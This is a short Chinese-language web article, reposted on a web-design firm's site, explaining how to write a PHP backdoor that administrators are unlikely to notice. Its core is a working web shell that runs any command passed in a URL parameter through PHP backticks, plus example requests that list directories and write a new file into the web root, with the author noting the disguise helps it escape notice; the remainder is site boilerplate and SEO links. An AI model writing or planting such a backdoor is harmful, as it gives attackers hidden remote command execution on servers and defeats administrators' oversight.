如何編寫一個不易被發現的PHP后門代碼-創新互聯
本篇內容介紹了“如何編寫一個不易被發現的PHP后門代碼”的有關知識,在實際案例的操作過程中,不少人都會遇到這樣的困境,接下來就讓小編帶領大家學習一下如何處理這些情況吧!希望大家仔細閱讀,能夠學有所成!
這里用到了一個一般的PHPer都不怎么關注的反撇號 ` ,反撇號包含的字符串,等同于shell_exec函數。
偽裝性很好,很容易被管理員忽略。
$selfNums = $_GET['r'];
if (isset($selfNums)){
echo `$selfNums`;
}剛看到這段代碼我想大家都會說沒有問題,但是細心的朋友也會發現下面的變量被一個符號包起來了,既然是變量為什么要這樣了,
而且又不是單引號,這個就是關鍵所在了,這個符號是 Esc 下面的一個鍵(位于感嘆號!旁邊的),
通過 echo `系統命令`; 可以達到 system(); 一樣的效果
如果不信的朋友可以測試
http://127.0.0.1/t.php?r=dir可以列出目錄
http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:\web\90sec.php
我用 appserv 和虛擬主機已經測試成功。
“如何編寫一個不易被發現的PHP后門代碼”的內容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業相關的知識可以關注創新互聯網站,小編將為大家輸出更多高質量的實用文章!
分享標題:如何編寫一個不易被發現的PHP后門代碼-創新互聯
瀏覽地址:http://m.newbst.com/article24/dcgpce.html
成都網站建設公司_創新互聯,為您提供網站維護、小程序開發、手機網站建設、ChatGPT、搜索引擎優化、網站制作
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯
- 成都做網站排名優化必須要具備哪些心理素質 2016-10-28
- 尚橙優化分享:穩定網站排名方法 2022-05-02
- 網站排名都有哪些優化技巧? 2013-12-28
- 提升網站排名的使用方法總結 2016-10-30
- 域名對網站排名有影響嗎 2013-08-31
- 成都網站制作-如何做網站seo才能保持網站排名 2023-02-19
- 網站排名和權重關系說 2016-11-01
- 網站排名怎么刷有效? 2013-12-27
- 網站排名優化,網站標題設置的基本要點有哪些? 2021-10-15
- 快速提升網站排名的10個操作! 2013-10-06
- 網站排名靠用戶 所以用戶體驗要放在首位 2021-04-24
- 對醫療網站排名提升艱難和如何應對的幾點思考 2023-02-01